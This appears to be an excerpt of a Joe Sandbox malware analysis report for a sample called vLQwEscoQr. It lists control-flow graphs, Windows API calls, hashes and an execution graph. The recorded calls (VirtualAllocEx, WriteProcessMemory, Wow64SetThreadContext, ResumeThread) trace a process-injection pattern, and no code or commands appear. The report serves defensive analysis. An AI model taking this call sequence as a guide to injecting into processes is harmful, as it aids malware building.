                              control_flow_graph 831 2e35dcc-2e35e99 CreateActCtxA 833 2e35ea2-2e35efc 831->833 834 2e35e9b-2e35ea1 831->834 841 2e35f0b-2e35f0f 833->841 842 2e35efe-2e35f01 833->842 834->833 843 2e35f11-2e35f1d 841->843 844 2e35f20 841->844 842->841 843->844 846 2e35f21 844->846 846->846
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 02E35E89
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 25c08df5020c7cc060d904f74fdbb6bb19acf3fb37c4f51add75844abe5582d0
                              • Instruction ID: 50fd3379ec14483df5c7c79bc7b20acdfb58628410d918c7c56da25c95729073
                              • Opcode Fuzzy Hash: 25c08df5020c7cc060d904f74fdbb6bb19acf3fb37c4f51add75844abe5582d0
                              • Instruction Fuzzy Hash: 5F41DEB1C00719CFDB25CFAAC884BDEBBB2BF48304F6081AAD418AB251DB755946CF50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 847 2e34544-2e35e99 CreateActCtxA 850 2e35ea2-2e35efc 847->850 851 2e35e9b-2e35ea1 847->851 858 2e35f0b-2e35f0f 850->858 859 2e35efe-2e35f01 850->859 851->850 860 2e35f11-2e35f1d 858->860 861 2e35f20 858->861 859->858 860->861 863 2e35f21 861->863 863->863
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 02E35E89
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 0a4cd5a8cfd6b23835b2860f9415f850f92b060273ce0ce8202cf8ddaed99f22
                              • Instruction ID: f905675b24ae27a448085086a6e9c207ba203e4ffe6cdc34c277b389e860ad4a
                              • Opcode Fuzzy Hash: 0a4cd5a8cfd6b23835b2860f9415f850f92b060273ce0ce8202cf8ddaed99f22
                              • Instruction Fuzzy Hash: 7741E275C00719CBDB25DFAAC8847CEBBF5BF48304F60806AD419AB250DB756946CF90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 864 75f7668-75f7672 866 75f7688-75f768d 864->866 867 75f7674-75f767d call 75f420c 864->867 869 75f768e-75f769f 866->869 870 75f76a2-75f7734 CreateIconFromResourceEx 866->870 871 75f7682-75f7684 867->871 875 75f773d-75f775a 870->875 876 75f7736-75f773c 870->876 871->866 876->875
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351226693.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_75f0000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: CreateFromIconResource
                              • String ID:
                              • API String ID: 3668623891-0
                              • Opcode ID: 3055103ec8ec268c0ed6cc5177ad2df6953a1d7175f85418f0dbc93fbfb20598
                              • Instruction ID: c611dfe98935e30844699e4856ccb97af48ec6166a2ebbf45bf0bc5598dbb4f7
                              • Opcode Fuzzy Hash: 3055103ec8ec268c0ed6cc5177ad2df6953a1d7175f85418f0dbc93fbfb20598
                              • Instruction Fuzzy Hash: CD318BB29043499FCB11DFA9D840ADEBFF8EF49310F14846AE654EB261C335A851DFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 879 797d2c2-797d2c5 880 797d2c7-797d2c8 879->880 881 797d25f-797d29a PostMessageW 879->881 882 797d2ca-797d2f5 880->882 883 797d349-797d34e 880->883 884 797d2a3-797d2b7 881->884 885 797d29c-797d2a2 881->885 886 797d2f7 882->886 887 797d2fc-797d30f 882->887 885->884 886->887 890 797d311-797d31e 887->890 891 797d320-797d33b 887->891 890->891 893 797d345-797d346 891->893 894 797d33d 891->894 893->883 894->893
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0797D28D
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: aeb731a825399d1e9aca6df7fb215dd6467321fc9de993a951d811cdc5369eab
                              • Instruction ID: b2a8f3c4913cc344a98cae37ed937ad680249b9dad634307663974f600bac60a
                              • Opcode Fuzzy Hash: aeb731a825399d1e9aca6df7fb215dd6467321fc9de993a951d811cdc5369eab
                              • Instruction Fuzzy Hash: E521ADB6E043198FDB10DF94E845BEEBBF4AF88318F04845AD404BB240C775AA45CBA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 897 79799b1-7979a06 900 7979a16-7979a55 WriteProcessMemory 897->900 901 7979a08-7979a14 897->901 903 7979a57-7979a5d 900->903 904 7979a5e-7979a8e 900->904 901->900 903->904
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07979A48
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: a647b36e79de1bda505ceffa5d02c27082f9b284b83de1a1674b264b226782cc
                              • Instruction ID: 2f494af526f7ed68ad210d19b6efd24367183f1602c3f7233d49de5ce1a6965b
                              • Opcode Fuzzy Hash: a647b36e79de1bda505ceffa5d02c27082f9b284b83de1a1674b264b226782cc
                              • Instruction Fuzzy Hash: DC216BB1D003199FDB10DFA9C881BDEBBF5FF48320F10842AE958A7240C7799941CBA0
                              APIs
                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 075F68AF
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351226693.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_75f0000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: DrawText
                              • String ID:
                              • API String ID: 2175133113-0
                              • Opcode ID: 760416a363c882166b8cebfc918e2f129f041a5be76ba76795107df3ee5c44e3
                              • Instruction ID: b2a4149008a758d1904756182ca92e77f214a2c15a2ea7bc279d115603f44af5
                              • Opcode Fuzzy Hash: 760416a363c882166b8cebfc918e2f129f041a5be76ba76795107df3ee5c44e3
                              • Instruction Fuzzy Hash: 5431C3B5D0020A9FDB10DF9AD884ADEFBF5FB48320F14842EE919A7210D7759945CFA0
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07979466
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: b5e5b1b79f9a2c39b1fb0a08fd8f4dae74224cc56d73a89e403db25ae4fcab2b
                              • Instruction ID: 6c51ae81c7fd278c52ebc703e829b7e6fb6e5718312609d4410174a7e54e5476
                              • Opcode Fuzzy Hash: b5e5b1b79f9a2c39b1fb0a08fd8f4dae74224cc56d73a89e403db25ae4fcab2b
                              • Instruction Fuzzy Hash: B82148B1D003198FDB20DFAAC4817EEBBF5EB48324F54842AD459A7240CB78A945CBA4
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07979A48
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: acf8894cdd9ec0d889c315d5f45bf10b521f9909288313a28b4d93a54b6ab25a
                              • Instruction ID: f4668c65c9bb185997996bbd8f79e187cb1988cabfb7368635ddc98fb2fc6247
                              • Opcode Fuzzy Hash: acf8894cdd9ec0d889c315d5f45bf10b521f9909288313a28b4d93a54b6ab25a
                              • Instruction Fuzzy Hash: 5F2139B1D003099FDB14DFAAC881BDEBBF5FF48324F508429E959A7240C779A941CBA4
                              APIs
                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 075F68AF
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351226693.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_75f0000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: DrawText
                              • String ID:
                              • API String ID: 2175133113-0
                              • Opcode ID: 6814872466fa356c85b70565a05b88f8230be7043ab26f751815f0366428c2e8
                              • Instruction ID: ba087b01f5361bf0ec6810e1b8049dbbfc065d6d8df7fb5f0716586ec12ce259
                              • Opcode Fuzzy Hash: 6814872466fa356c85b70565a05b88f8230be7043ab26f751815f0366428c2e8
                              • Instruction Fuzzy Hash: 4421ACB5D0020A9FDB10DF9AD884ADEBBF5FB48320F14842EE919A7210D775A945CFA0
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07979B28
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: fb9b70c827fb39583eb4e935aa338556241fc5327ff2b91057aa446e20e101b1
                              • Instruction ID: 210bd0890e1eadd26c60eb649ceee6fcfcca72e67ba73c7331785d51f91992d7
                              • Opcode Fuzzy Hash: fb9b70c827fb39583eb4e935aa338556241fc5327ff2b91057aa446e20e101b1
                              • Instruction Fuzzy Hash: FA2107B1D003599FDB10DFAAD841BDEBBF5FF48320F50842AE959A7240C7359941CBA4
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E3D76E,?,?,?,?,?), ref: 02E3D82F
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 7795dc78690a4ec981f6c31a5964b70cfab812dfe3f3348bc431562a8e5171d6
                              • Instruction ID: 63e23cf72ed019238c435ea06fd304fa4323015a3a2ec30302e16a959811736f
                              • Opcode Fuzzy Hash: 7795dc78690a4ec981f6c31a5964b70cfab812dfe3f3348bc431562a8e5171d6
                              • Instruction Fuzzy Hash: 062103B5D002089FDB10CF9AD984ADEFBF4FB48310F14806AE918A3310D375A941CFA0
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07979466
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 240b72f9e2f3c2f60bed9a41735f54af4e5a34fa3a55169f4b0ed6e80600e491
                              • Instruction ID: 3110b8d6139e74f09a0f4e8f4978e1becab93b82b707610ea3915e90fb9cbd01
                              • Opcode Fuzzy Hash: 240b72f9e2f3c2f60bed9a41735f54af4e5a34fa3a55169f4b0ed6e80600e491
                              • Instruction Fuzzy Hash: CF2138B1D003098FDB10DFAAC4857EEBBF5EF48324F548429D559A7240CB78A945CFA4
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07979B28
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 57b144df31f6113d585dcceb342b6056c08c6b9ce6f19e0d383fdb8e3c085af4
                              • Instruction ID: ebb609d3d59c8577df5e79f3cdc542042e78a0df274e42d8cb1ab530bffc543d
                              • Opcode Fuzzy Hash: 57b144df31f6113d585dcceb342b6056c08c6b9ce6f19e0d383fdb8e3c085af4
                              • Instruction Fuzzy Hash: 392128B1C003499FDB10DFAAC881BDEBBF5FF48320F50842AE919A7240C7399901CBA4
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07979966
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 29ae6794804ea45c61973744eb3995f3fcf29a4d1a24f6933e02670fe40bce8b
                              • Instruction ID: f6cbfac37ff6d40c9253d47ba31009c962505a36ef40c873f419ec747de1adc1
                              • Opcode Fuzzy Hash: 29ae6794804ea45c61973744eb3995f3fcf29a4d1a24f6933e02670fe40bce8b
                              • Instruction Fuzzy Hash: 181136719002098FDB20DFA9C845BEEBBF5EB48320F24881AE555A7250C7369541CFA0
                              APIs
                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,075F7682,?,?,?,?,?), ref: 075F7727
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351226693.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_75f0000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: CreateFromIconResource
                              • String ID:
                              • API String ID: 3668623891-0
                              • Opcode ID: b884bb3e7571b72da8e9f4ef7bd3e8c843aef2df8ccb5b5df33ce86c95f5c29f
                              • Instruction ID: f729fb24543a589a33834a0c0570f7b7f43ae7fa7abe4ed9cb8889a22261901f
                              • Opcode Fuzzy Hash: b884bb3e7571b72da8e9f4ef7bd3e8c843aef2df8ccb5b5df33ce86c95f5c29f
                              • Instruction Fuzzy Hash: 321137B580034D9FDB20DF9AD844BDEBFF8EB48320F54841AEA55A7250C375A950DFA4
                              APIs
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 3030d793f870d12faf7a8658b14fd64f4c2585d021b0f54effb0d17753ff2b19
                              • Instruction ID: 3c19f6e3c02c7a808198187b3092a98c7ad70d0ca08a758ff4cd53bb03a0b0b5
                              • Opcode Fuzzy Hash: 3030d793f870d12faf7a8658b14fd64f4c2585d021b0f54effb0d17753ff2b19
                              • Instruction Fuzzy Hash: D2119AB1C003098FDB20DFAAD4457EEFBF5EB48324F20881AD419A7640CB356941CFA4
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0797D28D
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 4b1d0be3a866abca6b0ff1283f4edf9f2f27005f83cc015795795b2f69299104
                              • Instruction ID: a2090e9d9551c3d89b27989d80405232384cc5e95b7ef3afca4cb7100bb3f289
                              • Opcode Fuzzy Hash: 4b1d0be3a866abca6b0ff1283f4edf9f2f27005f83cc015795795b2f69299104
                              • Instruction Fuzzy Hash: 301125B59003499FDB20DF9AD885BDEBBF8EB48324F10841AD959A7201C375A541CFA1
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07979966
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 8bbd7e5a663efdc9a5d84f453902a80526c4be8186ebbccf35a86f5c200935a5
                              • Instruction ID: c76bd52295bbcfb544d2945afab10b1e4650af819cc793adfb76cfa1d7f1c59f
                              • Opcode Fuzzy Hash: 8bbd7e5a663efdc9a5d84f453902a80526c4be8186ebbccf35a86f5c200935a5
                              • Instruction Fuzzy Hash: DE112671C003499FDB20DFAAC845BDEBBF9EB48320F148419E555A7250CB75A941CFA0
                              APIs
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: dc86ca5a25f507e406179b5a226982a1a39ed3b60a1bb36b4c6698a04ba179ee
                              • Instruction ID: f17d4b4ca0ba708fd9410bf51e058e85b1ccbe614709ed5a6c23c887c0f25f0e
                              • Opcode Fuzzy Hash: dc86ca5a25f507e406179b5a226982a1a39ed3b60a1bb36b4c6698a04ba179ee
                              • Instruction Fuzzy Hash: 991136B1D003498FDB20DFAAC445B9EFBF5EB88324F248819D519A7240CB79A941CFA4
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0797D28D
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1351455615.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7970000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 4a54618d1688bfa7e668a2c72b283cf352287711f6cddd0b324f2a39088ee7c9
                              • Instruction ID: 28956b0338771f229ec937da0eb184d52069593c04564f1c6fcb8de60fb7b2e1
                              • Opcode Fuzzy Hash: 4a54618d1688bfa7e668a2c72b283cf352287711f6cddd0b324f2a39088ee7c9
                              • Instruction Fuzzy Hash: EF1106B59003499FDB10DF9AD485BDEBBF8EB48324F108459E914A7200C375A945CFA5
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E3B51E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1346314320.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_2e30000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: f3881b3270fc519f65ba1c8241daeac19d4b58b13f7e9a00a1fa1836273a1b83
                              • Instruction ID: aa0695e648f8312022ca63f7615a99a18b3b087c4e2671cfd5a783504745e444
                              • Opcode Fuzzy Hash: f3881b3270fc519f65ba1c8241daeac19d4b58b13f7e9a00a1fa1836273a1b83
                              • Instruction Fuzzy Hash: F2110FB6C002498FCB20DF9AD444B9EFBF5AB88328F14846AD429A7200D379A545CFA1
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1344112534.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_128d000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6965356206163cf73e33f0f85d38d2cc1b7a3f04c96fb6e2a0792cb10bb7abef
                              • Instruction ID: 130995d3d36e86d9bf58ca98c9971a145cf7be92996089b8c76cefa7af0974f5
                              • Opcode Fuzzy Hash: 6965356206163cf73e33f0f85d38d2cc1b7a3f04c96fb6e2a0792cb10bb7abef
                              • Instruction Fuzzy Hash: A8213675514208DFDB05EF48D9C0B56BB65FB84324F20C169D9090B2D7C376E45ACAA2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1344283733.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_129d000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6a249a3bb2c33ee79f6889b143116038de46eacea2664cf0d6d021cccf4fba3
                              • Instruction ID: 2ee02e226035370800026f12803df7680f0be8254547d40067a69da70f4f7d72
                              • Opcode Fuzzy Hash: b6a249a3bb2c33ee79f6889b143116038de46eacea2664cf0d6d021cccf4fba3
                              • Instruction Fuzzy Hash: 7A213071614308DFDF14DF68D884B16BB61EB84314F20C56DD90A0B282C33AD807DA62
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1344283733.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_129d000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 014f8589962d5b9e9e8f001a573cb403b4b4d6cef5deff998492d99a29839ccc
                              • Instruction ID: 9191db5a94ebbb8ce4acdf4e636abdb926bb220fc818aadf340755094a60730b
                              • Opcode Fuzzy Hash: 014f8589962d5b9e9e8f001a573cb403b4b4d6cef5deff998492d99a29839ccc
                              • Instruction Fuzzy Hash: E5213775A14308DFDF05DF98D9C0B15BB61FB84324F20C5ADD9094B287C376D806DA61
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1344112534.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_128d000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                              • Instruction ID: 8d839e9d2b435f2407513573cbee338decff8dfe49ecbd05fbab7bf20c666ca1
                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                              • Instruction Fuzzy Hash: FA110376504284DFCB06DF48D5C0B56BF72FB84324F24C2A9D9090B297C33AE45ACBA1
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1344283733.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_129d000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                              • Instruction ID: 75c4af719fceafb765acf5431c7400cb386c997789168aa8a34cab3cde99df52
                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                              • Instruction Fuzzy Hash: 8411BB75904284DFDB06CF58C6C0B15BBA2FB84324F24C6ADD9494B297C33AD40ACB61
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1344283733.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_129d000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                              • Instruction ID: e629a68674127133de755b2fdbd0faff866ca3ebcfb832e395b6ba132d5ff9e0
                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                              • Instruction Fuzzy Hash: A311BB75504284CFDB16CF68D5C4B15BBA2FB84324F24C6AED9494B696C33AD40ACBA2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1344112534.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_128d000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd2fb5f91c83b0fa62dd415e852e24fd21d2df62086c74a8ed8d6e2631b8a57c
                              • Instruction ID: 03435aacb688b10c20630a2c7bcb2efe926fcec9617053e0e3bb1ea1ab0759b4
                              • Opcode Fuzzy Hash: dd2fb5f91c83b0fa62dd415e852e24fd21d2df62086c74a8ed8d6e2631b8a57c
                              • Instruction Fuzzy Hash: 5A01F7314263889AE7247A65CCC4B66BF98DF44225F18C419EE080A1C3C2789848CAB6
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1344112534.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_128d000_vLQwEscoQr.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 76e0565cc70c6fd83e26289e6d9ca27b7392d6f9a82a1f5f60c284e10ed6fa9c
                              • Instruction ID: 5324dbf05353a33e918c772dac544273cc8d9bd5a3b593ae409722c450a32977
                              • Opcode Fuzzy Hash: 76e0565cc70c6fd83e26289e6d9ca27b7392d6f9a82a1f5f60c284e10ed6fa9c
                              • Instruction Fuzzy Hash: 43F0C271005384AEE714AA1ACC84B62FF98EB84335F18C55AEE080A2C3C3789844CA71

                              Execution Graph

                              Execution Coverage:3%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:1.3%
                              Total number of Nodes:302
                              Total number of Limit Nodes:13
                              execution_graph 8943 408952 8964 40823f 8943->8964 8946 408960 8948 4056bf 2 API calls 8946->8948 8949 40896a 8948->8949 8992 408862 8949->8992 8951 4089c4 8952 413aca 4 API calls 8951->8952 8953 4089d4 8952->8953 8955 405695 2 API calls 8953->8955 8954 408975 8954->8951 9000 4087d6 8954->9000 8957 4089df 8955->8957 8962 402bab 2 API calls 8963 40899d 8962->8963 8963->8951 8963->8962 8965 40824d 8964->8965 8966 40831b 8965->8966 8967 4031e5 3 API calls 8965->8967 8966->8946 8980 4083bb 8966->8980 8968 40826d 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 408289 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082a5 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082c1 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082e2 8975->8976 8977 4031e5 3 API calls 8976->8977 8978 4082ff 8977->8978 8979 4031e5 3 API calls 8978->8979 8979->8966 9028 408363 8980->9028 8983 4084ab 8983->8946 8984 4056bf 2 API calls 8989 4083f4 8984->8989 8985 408492 8986 413aca 4 API calls 8985->8986 8987 4084a0 8986->8987 8988 405695 2 API calls 8987->8988 8988->8983 8989->8985 9031 40815d 8989->9031 9046 40805d 8989->9046 9061 404b8f 8992->9061 8994 40887e 8995 4031e5 3 API calls 8994->8995 8996 40893e 8994->8996 8998 408946 8994->8998 8999 402b7c 2 API calls 8994->8999 8995->8994 9064 404a39 8996->9064 8998->8954 8999->8994 9001 402b7c 2 API calls 9000->9001 9002 4087e7 9001->9002 9003 4031e5 3 API calls 9002->9003 9005 40885a 9002->9005 9007 408802 9003->9007 9004 402bab 2 API calls 9004->9005 9012 408749 9005->9012 9008 40884d 9007->9008 9011 408853 9007->9011 9073 408522 9007->9073 9077 4084b4 9007->9077 9080 4084d4 9008->9080 9011->9004 9013 404b8f 3 API calls 9012->9013 9014 408765 9013->9014 9015 4031e5 3 API calls 9014->9015 9016 408522 3 API calls 9014->9016 9017 4087c7 9014->9017 9019 4087cf 9014->9019 9015->9014 9016->9014 9018 404a39 4 API calls 9017->9018 9018->9019 9020 4085d1 9019->9020 9021 4086c2 9020->9021 9024 4085e9 9020->9024 9021->8963 9023 402bab 2 API calls 9023->9024 9024->9021 9024->9023 9025 4031e5 3 API calls 9024->9025 9086 4089e6 9024->9086 9105 4086c9 9024->9105 9109 4036a3 9024->9109 